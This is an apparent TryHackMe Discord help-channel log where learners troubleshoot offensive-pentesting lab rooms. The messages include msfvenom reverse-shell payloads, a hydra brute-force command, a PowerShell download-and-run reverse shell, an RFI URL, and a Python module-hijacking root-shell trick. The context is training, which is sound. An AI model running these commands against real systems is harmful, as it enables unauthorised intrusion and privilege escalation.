I am finding the Internal and Relevant Rooms too hard compared to the other ones. Is it normal? How should I tackle them?

I feel kinda bad looking at the writeups

I am considering skipping them and re trying once I finish the rest of the path, not sure if it is a good idea

I think Relevant’s foothold is a little silly but both rooms are mostly a test of methodology

Coming back to them is a perfectly fine approach

Learn from where you got stuck, and consider adding that to whatever mental/physical checklist you have when you do boxes.

I am slowly building a methodology for boxes, but I have a couple questions if you don't mind. How does brute forcing fit in CTFs? Do I have to try it for every login prompt (after trying default credentials)?

So I should always try it but for no longer than 5 mins? OK, Thank you!

Note that newer machines these days on CTF platforms tend to stray away from brute forcing a login as a foothold because it’s not very interesting after the first 5 times, but it’s still something to keep in mind for things beyond CTFs

if a brute force attack using a dictionary attack works it just means better passwords need to be made

hey guys , could you recommend me some books? i just finished reading Linux basics for hackers , and i read the first two books from networking all in one for dummies , i have very basic bash scripting skills , i know python and javascript so i think i can consider myself a "script kiddie" atleast , i would like to advance , what would be the best books for kali?

this channel is not the best for finding book recommendations so will point you to the #bookclub channel... where in the pins which you can find in the upper right of the screen on desktop or by swiping from the right to left on mobile has some book recommendations

i did check the channels but skiped that one lol , sorry for that and thanks

no problem

And the application should have measures to deal with brute force attacks

oh yeah that is an obvious oversight on shadows part.... thanks for the mention of it

Gave +1 Rep to @keen iris

Hello Friends, I need help at this point. Why id_rsa is being ignored?

what permissions i have to assign?

It's in big letters

And if you google the message, you can easily learn

"it is required that your private key files are NOT accessible by others."

Uhh okay.

Let me google it first

Thanks @keen iris

Gave +1 Rep to @keen iris

The general rule is that you should google it first before asking here

Okay Brother got it.

I tried with with chmod 600 but still same

Anyone can please guide!

Anyone can please guide?

read-only file system

So you can't modify it

Copy the file to somewhere locally

Ohhh Okay.

Hi. I already posted this in "subs-room-help" but I think this is the right place for that.

I'm on "Game Zone" and I'm stuck at task 5. I cant get the ssh tunnel to work.
If I try open "localhost:10000" on my machine the SSH-connection says "channel 3: open failed: administratively prohibited: open failed"

you need to change permission for file id_rsa. something like "chmod 0660 id_rsa"

Hi, I am wondering should I do the junior pen tester path before the offensive pen tester path? I have experience with Linux and msf etc, and have been working through the offensive path however just realised there is a junior path as well. I can’t find a way to enrol for more than one path at a time. Should I keep at the offensive path and do the jr pen tester path after or should I switch now?

I'm solving Steel Mountain, but my reverse shell don't work

C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.


C:\Program Files (x86)\IObit\Advanced SystemCare>

msf6 exploit(multi/handler) > run 

[*] Started reverse TCP handler **.*.**.**:9898 

What is the problem

I tried many ways like:

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=**.*.**.** LPORT=9898 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

I tried to generate it with -f exe option also

msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     **.*.**.**       yes       The listen address (an interface may be specified)
   LPORT     9898             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run 

[*] Started reverse TCP handler on **.*.**.**:9898 

I'm doing the buffer overflow room Brainstorm and I cannot get the chat application to run on my windows 7 64 bit VM and on my windows 10 64 bit VM. I've tried troubleshooting compatibility to no avail. Can someone please help me out?

I've seen 2 writeups (one text and the other a video) and they don't seem to have any issues running the chatserver app

fyi, you have to have the dll in the same directory from where you're running the app

Yes, did that

can you show a screenshot of the error? you'll have to verify to send images

!docs verify

@fathom marten here's the error from win10

The error from win7

same directory structure in win7 as in win10

yeh, that's a VM thing, if you want to run it still, you can use thm's blue machine or windows base machine but it'll run fine in Immunity debugger AFAIK

😮 wow thanks a ton

could you tell me where to find the thm windows base machine?

https://tryhackme.com/room/windowsbase

arghh great! thanks again!

Hello is there a W7 iso file to download for immunitydebug & mona or do I have to create it from scratch?

(for brainpan)

thx

just download and run the normal setup file

ok nothing fancy then

-f exe-service

Ah wait that's there

Well I give up, I cannot run nor can I open the chatserver executable from the BrainStorm room. I've tried everything I can think of. I tried using the 64 bit and 32 bit version of Windows 10 and windows 7 and I also tried using the windows 10 base machine provided by tryhackme and I cannot get it to open.

Anyone able to do this room? Any suggestions for being able to debug the executable?

Download it in binary mode

And any DLLs also

Otherwise they get corrupted

The closest I got to running it was in Windows 10 32 bit. When I open it, I get an error saying "This program cannot be run in DOS mode"

I did that

Beyond that, I have no suggestions

crap

One of the times I tried to run it, yes

Same error

"This program cannot be run in DOS mode"

also

and I tried opening it directly from immunity

Why would that help?

Hint: it wouldn't
It's a compiled program

Context matters here

☝️

wouldnt something like kdbg work? just trying, i used rdp to do the room

or ghidra

I haven't been able to figure out how to do brainstorm. I had the same issue with gatekeeper, but found the solution using the "dobufferstackoverflowgood" executable found on the buffer overflow prep machine. I saw a different executable called vulnserver with the essfunc.dll that I think chatserver uses but vulnserver seems to work different compared to chatserver, so I haven't done it.

I had no issue just creating a new windows 10 VM (workstation 16), installing immunity and mona and running the oscp ones (gatekeeper, chatserver, brainpain). So it does work.

nothing special, no windows updates from original iso install yet, just an isolated test VM

working on Overpass 2 - Hacked room and I'm up to the point where I'm attempting to get back in... when I try to get into the back door I get something unexpected: (see screenshot) -- any ideas?✅

Self-resolved.

Hi, I have a strange issue with brainstorm, found the right EIP, rtn adress, whatever ; got a reverse shell on my w7 box, BUT, when i'm trying on THM network, connected to OpenVPN for sure, changing IP on the script with box IP, I can't have a reverse shell. It's the same exploit, only ip changing and I have no issues connected thru VPN. Any ideas? Thanks for your help 😄

Try the same script from the attackbox, a number of people have had the same issue

ok will do right now!

thx

and it's working!

thx a lot @fathom marten was wondering why :p

Gave +1 Rep to @fathom marten

Honestly, not sure why this happens but maybe something to do with the connection from vpn and attackbox 🤷‍♂️

strangely anyway

Listening on [0.0.0.0] (family 0, port 443)
Connection from 104.210.55.152 45193 received!
\ufffd\ufffd62\ufffdZ\ufffd\ufffdM\ufffd\ufffd]b\ufffdu\ufffd\ufffd2\ufffdP\u0540\ufffd\ufffd\ufffd}\ufffdet\ufffd\ufffd @\ufffd
^^

well will try to understand why

I'm solving Brainstorm but I can't download the chatserver

ftp> cd chatserver
250 CWD command successful.
ftp> binary 
200 Type set to I.
ftp> mget *
ftp: Can't connect to `10.10.51.142:49173': Connection timed out
421 Service not available, remote server has closed connection.
ftp> 

Use get and see if it works

dont forget binay or it will be corrupted

Ah wait, is this the correct port? 49173

Yes

I have downloaded it using the attack box, I think I have a bad connection

👍

Thank you for your support

it was me for brainstorm :p happy to finaly got it! ^^

Hello

I have been stuck at the Steel Mountain task 4

having this screen when I'm trying to attack the target machine

SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 2-3: truncated \UXXXXXXXX escape

can someone help me?

Weird, the only difference is that I use vbox... That shouldn't have an impact though

constantly having machines disconnect on me tonight... is there some server maintenance or something happening?

How do i setup host in /etc/hosts in the nahamsec thing ontry hack me, im using my own vm with openvpn

You just add a line like this:

<IP> <domain-name>

Another good way is

echo "10.10.xxx.xxx NAME.thm" | sudo tee -a /etc/hosts

Hi all! I'm just getting started on the Offpen learning path. Within the Vulnveristy room, it looks like my attackbox is not running a webserver, which is stopping my progress. Has anyone ran into this before and if so, did you manage to fix it? Thanks ahead of time.

Oh ya for sure. It looks like the learning path for gobuster, Burpsuite, and privilage escalation all rely on this vulnerable preconfigured web server though.

Yup it's up and running. It looks like port 3333 should be opening, running an apache web server. However, on my specific machine, it is not.

Well i'm on the step when we use gobuster to discover the directories of the webserver and of course, I can't access the webserver via that tool.

Well the web server isnt running.

I checked via nmap. However, my IP is 10.10.20.137.

Doh!

Well I'm going to go hide in a corner for a while lol! It's always a user error right? haha

Thank you for the help

We call those a PICNIC

Ok I gotta know... what does PICNIC stand for lol?

Problem in chair, not in computer

Haha that's spot on

Hello everyone, I just completed this path and the certificate didn't show my full name, so I changed it to make it correct, but now the certificate doesn't seem to update

So I wanted to know if i'm screwed or if it will change with a little patience, or if I need to do something else ?

Thanks for your reponse

Anyone else have this issue - my revshell from msfvenom gets this error Command shell session 1 is not valid and will be closed

Make sure your handler has the payload set correctly

This is what I set msfvenom -p windows/meterpreter/reverse_tcp LHOST=VPNIP LPORT=9001 -f exe > rshell.exe ...then msfconsole - use exlpoit/multi/handler - set LHOST and LPORT - run

You need to set your payload in multi/handler
Don't use > for binary data, it can break your payload

set payload windows/meterpreter/reverse_tcp - you were right ..thanks for the help

ID 10 T errors

I need help understanding args i cant find anyone talking about it online. for example I dont even understand this question What optional argument can the ftp-anon.nse script take?

I think you’re talking about code analysis? For instance, you should be able to take some script that you’ve downloaded and open it in a text editor then scan the code for what parameters the methods within take. My apologies if you’ve already done this.

The documentation online has only one argument for that script and it has a default setting so you don’t even need to provide it. You call the script using nmap —script=ftp-anon $IP

Is there anyone willing to sort of mentor me on buffer overflows? It's one of the few things I'm still struggling with and need to get past.

please DM me ❤️

Can someone help me with the following room? https://tryhackme.com/room/metasploitintro

I can't seem to get into the live machine while following the steps, i was wondering if anyone could look into it with me

But i seem to get failures

What is wrong about the LHOST

should it be the ovpn ip?

Thank you, I assume this is the case for every exploit i try to run using ovpn right?

You need to bear in mind where the reverse shell is going

I was having issues with the room called Brainstorm earlier -- Task 1 question 2 asks "How many ports are open?" -- I did an nmap scan and got an answer. I put that answer in to the block, clicked the submit button, incorrect. Looking for someone to confirm that there's a problem with the room?

yeh, it's been a common issue, maybe udp ports are counted, maybe the room machine got updated and closed extra posts, it's irrelevant to the actual machine for what it's worth

Thanks I've been spinning my wheels trying to get to the "Correct" answer but i guess my answer is right already

I'm having trouble running the PowerUp shell on the Steel Mountain machine, anyone know how to solve it?

that's an html file

notice the button and div tags you see in a standard html file, wget using the raw link or copy paste the actual code

You say create a direct file on the compromised machine?

No

When I executed the PowerUp file, the system returned me error in all parameters

You downloaded an HTML file

Not the powershell script

How could we know the active directory domain name in Attacktive Directory in task 4 ?

probably use enum4linux

enum4linux -A IP_address                 
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Aug  6 08:54:45 2022

 =========================================( Target Information )=========================================

Target ........... IP_address
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on IP_address )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on IP_address )===================================


[+] Server IP_address allows sessions using username '', password ''


 ================================( Getting domain SID for IP_address )================================

Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963

[+] Host is part of a domain (not a workgroup)

enum4linux complete on Sat Aug  6 08:54:57 2022

I found smb domain name: THM-AD but it's not active directory domain

An nmap scan of all ports with -sC will tell you

Thank you

Gave +1 Rep to @mellow tusk

Is it normal that the room Daily Bugle is vulnerable to CVE 2021-4034 ? I can give more info if needed.

It's a very old room.

So all the newer exploits will work.

Ok thx

Hello, I am currently doing Abusing Kerberos in Attacktive Directory. When i try to run the command GetNPUsers.py spookysec.local/svc-admin -no-pass I get the following error: Traceback (most recent call last):
File "GetNPUsers.py", line 42, in <module>
from impacket.examples.utils import parse_credentials
ModuleNotFoundError: No module named 'impacket.examples.utils'

Could anybody help me out.

what is impacket version

I am using the in browser instance of THM

Version used is 0.10.0

as in the in browser instance of THM Box

and I am getting an issue with secretsdump.py also

Traceback (most recent call last):
File "secretsdump.py", line 61, in <module>
from impacket.examples.utils import parse_target
ModuleNotFoundError: No module named 'impacket.examples.utils'

I think you are using python2 not 3

The machine uses Python3

root@ip-x.x.x.x:/opt/impacket/examples# python3 GetNPUsers.py spookysec.local/svc-admin -no-pass
Traceback (most recent call last):
File "GetNPUsers.py", line 42, in <module>
from impacket.examples.utils import parse_credentials
ModuleNotFoundError: No module named 'impacket.examples.utils'

root@ip-x.x.x.x:/opt/impacket/examples# GetNPUsers.py spookysec.local/svc-admin -no-pass
Traceback (most recent call last):
File "/usr/local/bin/GetNPUsers.py", line 4, in <module>
import('pkg_resources').run_script('impacket==0.10.1.dev1+20220606.123812.ac35841f', 'GetNPUsers.py')
File "/usr/local/lib/python3.6/dist-packages/pkg_resources/init.py", line 665, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/local/lib/python3.6/dist-packages/pkg_resources/init.py", line 1463, in run_script
exec(code, namespace, namespace)
File "/usr/local/lib/python3.6/dist-packages/impacket-0.10.1.dev1+20220606.123812.ac35841f-py3.6.egg/EGG-INFO/scripts/GetNPUsers.py", line 40, in <module>
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH
File "/usr/local/lib/python3.6/dist-packages/impacket-0.10.1.dev1+20220606.123812.ac35841f-py3.6.egg/impacket/dcerpc/v5/samr.py", line 32, in <module>
from impacket.dcerpc.v5.rpcrt import DCERPCException
File "/usr/local/lib/python3.6/dist-packages/impacket-0.10.1.dev1+20220606.123812.ac35841f-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 26, in <module>
from Cryptodome.Cipher import ARC4

File "/usr/local/lib/python3.6/dist-packages/Cryptodome/Cipher/init.py", line 27, in <module>
from Cryptodome.Cipher._mode_ecb import _create_ecb_cipher
File "/usr/local/lib/python3.6/dist-packages/Cryptodome/Cipher/_mode_ecb.py", line 29, in <module>
from Cryptodome.Util._raw_api import (load_pycryptodome_raw_lib,
File "/usr/local/lib/python3.6/dist-packages/Cryptodome/Util/_raw_api.py", line 86, in <module>
ffi = FFI()
File "/usr/local/lib/python3.6/dist-packages/cffi/api.py", line 56, in init
backend.version, backend.file))
Exception: Version mismatch: this is the 'cffi' package version 1.14.2, located in '/usr/local/lib/python3.6/dist-packages/cffi/api.py'. When we import the top-level '_cffi_backend' extension module, we get version 1.11.5, located in '/usr/lib/python3/dist-packages/_cffi_backend.cpython-36m-x86_64-linux-gnu.so'. The two versions should be equal; check your installation.

I’m offended

by?

This pentesting path

because?

It’s offensive

lol

😂

Red team moment

I know the daily bugle is categorized as a hard box but, it didn’t seem very hard. I was proud at first to be able to do a hard box on my own but, it seemed to easy. Anyone else get that feeling?

There's a weird bit in the middle but it's not technically too difficult

Any tip what wordpress is using for hash? I found examples like: $P$BU6KTu61vxuI92JgwTztG1yTcR90Ar0

is there any chances to decrypt? (i am beginner)

first identify the type of hash by using hasid $HASH or hash-identifier

i found out this is a phpass HASH used by wordpress

Where'd you get the hash from? A room on the path?

No i found on internet trying to learn more about hashes

Where on the internet?

here is another one

https://www.osi.security/blog/cracking-wordpress-hashes

there are a lot of

Has anyone recently completed "Brainstorm" without issue? I've been having some serious issues with the box's functionality -- curious if it is just me

Please ask your questions directly

want me to dm you or who do I ask directly?

Ask here
Explain your issue
Don't ask if anyone's complete the room recently. Ask for the help you actually need.

That's the thing, I don't actually have a question or need any help with buffer overflows -- I just need to know if the machine is operating as expected. If it is, then I don't need anything.

Please describe why and how it's not operating as you'd expect.

That's what you evidently want help with....

first issue: when I connect to the ftp anonymously...

#room-help message

#site-support message

I could use some help, please. I just made it to Bash Scripting, and I feel lost. I'm having trouble executing the bash exercise in Linux. Wondering if someone can help guide me while I practice. Or should I just skip it and move on?

Hello, I'm on the Attacktive Directory module, on the task 8 ( flag submission ).

In the previous task i obtained the hashes from the different users, including Administrator, svc-admin, backup, etc. This task is to get the flags from their desktops. I assume i need to use evil-winrm and i believe this is the right use but still is dropping errors. See below:

Then when i don't come with other things and i was reviewing my notes. I went to check some writeup and they are doing exactly as i do, it just does not work for me

Someone who might be able to help?

So I'm on vulnversity box, using burpsuite for the sniper attack - I sorted the payload and tags as directed, and when I ran the attack it gave me 'Extension not allowed' as the response for .phtml. I adjusted it, so the payload didn't include the dot - it stayed within the request itself and didn't vary, which made the extension work. Apparently the dot gets converted into URL, so it become %2e, which meant the website didn't recognise it. Any tips apart from the obvious (keep the dot constant) to avoid this?

thanks :)

So I've come back to the room, and I'm trying to send the same request to intruder to see if I can get it to work the way the instructions ask

I have burpsuite open, scope limited only to the website, proxy options changed so it only intercepts requests to URL inside scope, but other than that no other changes

as soon as I press submit on the upload form CPU usage on the AttackBox shoots right up to 100%, and BurpSuite is completely unresponsive - I can't press any buttons, and when I minimise and open it back up again it's a completely white page

it doesn't respond to me trying to close it

this is using firefox with foxyproxy on default burp settings

it's worked for me without the scope settings

Can someone help ? i kept trying. Same results

Hi walter, your syntax looks good! it looks like you have a spelling error in with "Administrator"

Mabye try that 😄

at the begining i though i was the silliest but then i remembered that i tried other accounts as well and i got the same result. You marked a great pooint ! but still the same.

have u tried adding that ip to your /etc/hosts and use hostname instead of ip

When i did the room, i didnt put the domain in front of the user, i just did it like this: - You could try that perhaps 😄

what note tool is that?

it´s obsidian - really cool 😄

i use that too lol

but how do u make that box?

oh it's a "code block" the syntax is like this:

some code

the only thing i can do lol

oh well discord use the same syntac for code blocks

ohh how about that red shell?

ill send a screenshot

ahh three `

yup and you just put whatever coding language u want and it will try to highlight 😄

mine show like this

ohh u need to give it a name after three `

yea so "bash" or shell

that's why mine is always blank

it will try and do it's best at highlighting

thank you

Gave +1 Rep to @drifting vapor

Gotchu

hello

somebody doing buffer overflow or studiyn it?

Hello, I have a problem with Overpass2 and in the end of the room when you should ssh on -p 2222 james@>ip< back in to the server as the attacker did I can´t connect. Getting an error message. Don´t know what to do.

Unable to negotiate with 10.10.56.241 port 2222: no matching host key type found. Their offer: ssh-rsa

are you studiyn BO from where?

👍

overthewire for BO? will take a look on ROPemperium and picoctf

thenks person!!!! i was only doing bash commands challenges

Someone with the problem in Brainstorm too?

I figured it out a while ago - let me know if I can be helpful

Hi. For the HackPark i created a reverse_tcp payload with the Message.exe title and set up the handler. But when i tried to invoke it from my shell i get the following error: Invoke-WebRequest : The process cannot access the file 'C:\Program Files
(x86)\SystemScheduler\Message.exe' because it is being used by another process.

@woeful arrow What did you figure it out?

The only challenging part of the room for me was getting the binary off of the ftp server. I was getting an error message I’d never encountered before from ftp, I imagine they made it part of the room but I’m unsure.

Once I had the binary, I sent it over to my windows 10 machine and used some custom python scripts to figure out the ESP/EIP for buffer overflow.

I think the ftp server was set to passive mode or something silly, and getting it out of passive mode is pretty simple— easy Google search

Yeah, passive and if need binary

@woeful arrow and you got the shell?

Why does AS-REP roasting require the pre-authentification to be disabled? If I understood correctly, this attack consists on brute-forcing the KRB_AS_REP response, which gets sent anyways

I'm on the Attacking Kerberos Room

https://attack.mitre.org/techniques/T1558/004/

That might help you here

If you can't see it, I can point out the important bit

Isn't it possible to sniff the AS-REP? Wouldn't that make the attack effective even if pre-authentification is enabled?

If I correctly understood what you sent (BTW thank you), if pre-authentification is disabled then it is easier to get the AS-REP for a specific user. But I don't see why enabling it would prevent people from just sniffing

https://adsecurity.org/?p=2293#:~:text=Note that this attack can also work by sniffing network traffic and grabbing Kerberos TGS tickets encrypted using RC4_HMAC_MD5 off the wire. - maybe slightly different as that's tgs?

Afternooon everyone

Yes. Been the toughest section for me. Still working through the BO section now

im still studing... too afraid to start... need to understand the basic so im looking for info everywhere... channel from youtuber s4vitar help a lot... and liveOverflow too..

Well the basics surrounding how Buffer Overflow works is very confusing. Let me find this video by that famous british IT sec guy

https://duckduckgo.com/?q=Buffer+Overflow+overview+explination+youtube&t=brave&iax=videos&ia=videos&iai=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D1S0aBV-Waeo

s4vitar has a video doing a x32 machine from HTB, there is very well explanied for the basics

is in spanish of course

cool! good to know although me espanol is no bueno!

take a look on liveOverflow channel, is awesome

the cybermentor has a good explanation too

Awesome! Will do. Thanks

Hello all,

Someone know why rockyou.txt wont load in burpsuite?

I could imagine that is very large for a VM but i have plenty ram and processor

smaller dictionaries load correctly

any workaround?

Only load the top 20k lines or something

ye, i see the logic of not needed to use that many. But if i that would not be enough, always worth to give a shot to larger lists

I was asking because of this.

that command does not work for me

so i was trying burp

It's HackPark

from the offensive pentesting path

where the error in the sintax?

YES

you need to get stuff from the browser i think

should look somthing like this:

INTERNAL USE CASE: (Gathered details using web browser console > network tab)

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.73.174 http-post-form "/phpmyadmin/index.php:pma_username=admin&pma_password=^PASS^&server=1&target=index.php&token=bfe8aacb8a8c4631dc57ad13fc02bc05:#1045 - Access denied for user 'admin'@'localhost' (using password: YES)" -vv

ouhh i see

good video, thanks, gonna watch it now

Worked ! Thanks man !

Gave +1 Rep to @hidden shoal

Anyone gone through BrainPan yet? Seem to be having trouble getting the reserve shell on this one, whether on a windows machine hosting the vulnerable exe or going straight at the target machine. I've checked my buffer, jump points, offset against walkthroughs at this point to see them match. I can even see bidirectional traffic on the port the exe listens on when running the exploit. But Im not seeing the reverse shell port traffic used we are listening for hit over tcpdump to the attacking machine. tried many variations of payloads and exploits.

Damn fine idea. Thanks for that

Gave +1 Rep to @hidden shoal

That worked

msfvenom -p windows/exec CMD=calc.exe -b "x00" -f py

Cool thanks for that suggestion. I'm sure Ill use that frequently in the future XD

Hello guys im currently working on attacktive directory and keep getting an error when trying to run GetNPUsers.py

The two versions should be equal; check your installation.

im not exactly sure what to check

can you verify and post a screenshot?

!docs verify

yea i can hold on

Smh now I have this issue 🤦🏾‍♂️

Oh wow smh ok thanks for the tip

I think an update is being worked on, but yup, not ready yet

Hey, guys! I'm doing the brainstorm room and I'm having problems opening the .exe into my windows immunity debbuger. Does the .exe is a 32 bit?

I currently have a 64bit windows so I was wondering If I would need to install a 32bit windows just for this exe

This is the error I was referring to before

try running it as python3.9 GetNPUsers.py ?

I want to do Python module Hijacking, there is a file called run.py I can run as root without password according to

sudo -l 
    (root) NOPASSWD: /usr/bin/python3 /home/cyber/run.py

run.py content:

import os,sys,time


def delay_print(s):
    for c in s:
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(0.08)

def main():
    os.setuid(0);
    delay_print("Hey Cyber I have tested all the main components of our web server but something unusal happened from my end!");
    print("\n")
    os.system('service apache2 restart > /dev/null 2>&1');

main();

I created a file called sys.py in the same directory
it's content:

import os 
os.setuid(0)
os.system('/bin/bash')

then

export PYTHONPATH=/home/cyber/
sudo /usr/bin/python3 /home/cyber/run.py

But run.py imports the original sys module not my file, What should I do

which room?

battery

can you move the file and create a new file in the name of run.py

yes I can,I've finished the room But I want to do Python module Hijacking

@rocky wind this is what came up

Hello, wondering if you can help. I messed up my kali VM so had to reinstall it from scratch, reorganize my stuff, etc.

First time i continue with THM in the new machine, i go to the machine Retro ( Offensive Pentesting Path ). I find the user/password for the WordPress page and lets me in. I go to Plugins and find the place where i can edit the php code and put the reverse shell code. I've done this few times already in my previous machine but in here, there is some sort of issue.

wondering if its because it might be a win machine?

i know, that's why im wondering it

but that uname there is crutial

to drop the shell

sec

if you copy that line to your console, it'll drop a shell

i can try but why? this is the reverse shell from pentest monkeys

i've used the same script in other ocassions and never had an issue

that's was my initial suspiciousnes

meterpreter shells is the easy way out for windows shells

unless you can finagle getting nc.exe or socat.exe on the target machine and make it execute and point at you

i switched that one for cmd.exe

does not work, neither using metasploit

it worked using this reverse code instead

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell_older.php

Hello, guys, I think I need your help with this one. I started working on the 'Active Directory Basics' room in the Offensive Pentesting Learning Path. In the fourth task I am supposed to do the delegation and give privilege to change others' passwords to a user phillip. Unfortunately, every time I granted the privilege to a user phillip and switched to his account I was not able to change sophie's password. I'm sending you also a screenshot of what error I have. I see that phillip doesn't have the permission for given action but I don't know why. Is there anyone that can help with this? Thanks a lot.

Looks like you may still need to do the delegation step

At least thats what the error looks like. Were you able to get it to work?

Hey, are you using the check users button after typing phillip to confirm you're assigning the permissions to the right account?

i changed the full name to my actual name in my profile but the certificate won't change it. How can i get it with my name ?

I Faced the same problem so i changed my name to orignal for next certs🙂

#site-support message

yes i did but thanks anyway. the problem was that i was give permissions over wrong OU

Gave +1 Rep to @rocky wind

for a complete beginner which room/walkthroughs should he start from ?

Use the learning paths

do the complete beginner path first and then focus on the area of interest

@hidden shoal https://tryhackme.com/resources/blog/free_path

i was thinking about this one

is a good start to be a pentester ?

oh

idk what to doo...

😔

after these will be able to do the basics penetrations and offensive pentesting rooms ?

+rep @hidden shoal thanks ly

Gave +1 Rep to @hidden shoal

@hidden shoalmost of the room in jr pentester path are for subscription users only

what should i do ?

all of these ^^

search for rooms in the hacktivites tab that are free and do those

lots of free rooms available that are not part of the paths

yeah ik but i was suggested to do pre pentesting and pre security so yh

well if you can't afford a subscription you are better of searching rooms on things you wanna learn checking for the free ones on said topic

surely will

thanks <3

no problem

btw its not that i can't afford it but im not all the way in yet

like its not my top priority rn,

im preparing for a test these days

so i have like 3hrs at most to do these stuff

i will sub after the test tho

yhh 😊

For the Room Alfred, after logging into the jenkins site. When I got to configure the project and change the command to download my shell file and then run it, it returns with this.

Any solutions? I seen people had this issue

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Thats the code they tell you to use on the THM Room, I have set my python -m http.server and it dosent work.

what IP are you using?

the one from the VPN ?

Yes

@fleet wedge The tun0

This is my response from my terminal

so what doesn't work? seems like the listener is well

\

404 - your paths for the files are wrong, you've likely got a typo or you're serving from the wrong place

hi people! xfreerdp is not installing on parrot any suggestion?

#infosec-general

Ok thanks!

Gave +1 Rep to @keen iris

Why cant I reach a connection to my Python -m http.server? I am trying to get files from it with http://10.10.228.74/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.48.7:8000/rshell.php and I do not get not file download or any response at all, why would that be? The IP in the http://10.6.48.7:8000/rshell.php part is my Tun0 IP from OpenVPN

Remote File Inclusion????

Yes

that is very rarely a way to exploit machines... so have a feeling that is not the intended way here either.....

could be wrong about that though

On their write up it is

oh okay then

The problem is receiving a connection with my python server because I had this issue yesterday as well with another exploit.

Which was there^ in the replied message

!vpnscript

just to check the most basic thingy first

@vernal mason

I had put Y and reran the script and came back with the same warning

Gotcha, but I am still with the same issue, would you be able to assist me?

Gotcha

Yes because I can access it on my box but anywhere else no

How do I tick that off

Ah yes I tried this yesterday.

That was what it was at when I ran the command.

Should I disable disable ufw?

Gracias!

No connection or response

Skynet

I believe I know the issue in the revshell file but I wanna fix the python server first because I had the same issue yesterday with this and when I switched from my VM to the attackbox on the site it worked fine.

Got it working

Thanks

Can i request that the middle bit of the H in the ascii art goes up by one as well? 😄 I always read it as TryWackMe

fixed sorry to disturb! thanks anyway to help

Gave +1 Rep to @glad kindle

somebody know why on brainstorm task 1 answer port open is 6 but when scan only show 3?

did you let the target machine actually fully start before throwing the scan at it

yey... but even on cybermentor write up never show 6 ports open

writeups can become outdated

and also another possibility is open udp ports

tried but nop

weird...🕵🏻‍♂️

hi tryng to get a file, ive generated a python server and make wget from win10 but its not working... any help?

trying to get chatserver.exe from room brainstorm

have you tried -outfile "output.exe"?

i do those commands in cmd but is uses powershell so idk the exact syntax in powershell

oh nvm i just say the -O

wget your url before outputting it maybe

hey guys planning to start the offensive pentesting path in a couple of next days and would love to have someone encourage me and we can share knowledge and help each other along the way. Preferably level 8-10. My username is whoami2000

when start a arp scan the windows machine don't get the ip from my parrot

Did you use a bridged adapter on your Windows VM?

nop...NAT... but cause didnt work tryied both... still dont work

Weird because VM and actual computer should be able to communicate with eachother when you are using bridged

Y u use bridged.

Try this in you cmd ‘powershell -c wget “http://<ip-httpServer>:8000/chatserver.exe” -outfile chatserver.exe’

Doubt this will change anything

But you can try

will try then tell you

but wait

shoul i use nat or bridge on parrot and win10 VB?

bridge

just

on the VM

both parrot and win?

so you just set the adapter settings to bridged on your VM

no, only Win

ok

let me restart it

here

its in spanish but its bridge

Start VM and check ip, etc

ah wait xd

You are using 2 VM's?

no no

well

wait

have parrot and win10 on my VB

So you are using parrot for THM and win10 for windows stuff?

yay

the win10 is installed to make proof like blue, BO, etc

Then i think you should use an internal adapter for your 2 VM's to be able to connect

and communicate

https://www.brianlinkletter.com/2016/07/how-to-use-virtualbox-to-emulate-a-network/

check this

parrot doesnt have problem while transfer between my machine, but win10 on VB doesnt transfer anythyng, even if i copy and paste. is like doesnt recognize anything external

I mean copying and pasting between VM's is always weird

yay

Try to put 'adapter 2' from parrot and windows to 'internal'

ok

let me restart everything again XD

😅

What is you main OS? Windows?

yay

in adapter 2, what should i put on parrot?

internal

Its all explained in the link btw xd

so adapter 1 should i let it on NAT?

if you want to use the internet yeah 😄

@copper crypt @rancid compass #infosec-general

ok sorry

This channel is only for the #offensive-pentesting-path and rooms on that path

Right, mb

In the Post-Exploitation Basics Room, I faced a difficulty with Bloodhound. I'm new to Bloodhound. The upload button does nothing. Import button responds with "BAD JSON FILE". So, the only way I can upload the file is by the drag & drop method. But, in the Upload Progress window, it says "File created from incompatible collector" "NaN%". And it does not process the file. Any idea what I am doing wrong? Thanks.

Regarding Post-Exploitation Basics Task 3, I found the most success using the Attackbox and the last Bloodhound version before version 4 (3.0.5 I think). After unzipping the download, run the file named "Bloodhound" in the folder using the "--no-sandbox" flag, and you should be good to go. DON'T use the version of Bloodhound already installed. As of 8/28/22, it's not compatible with the version of SharpHound on the Windows machine you're running mimikatz and whatnot on
Hope this saves people some time troubleshooting
@hollow gyro

@vernal mason Thanks for tip. I shall try it.

Gave +1 Rep to @vernal mason

no problem

Hi! I just subscribed and got stuck right away with the php reverse shell which doesn't seem to work well for me (I'm using the in-browser thingie). Any hints what's wrong? https://imgur.com/a/xZ0UFcD

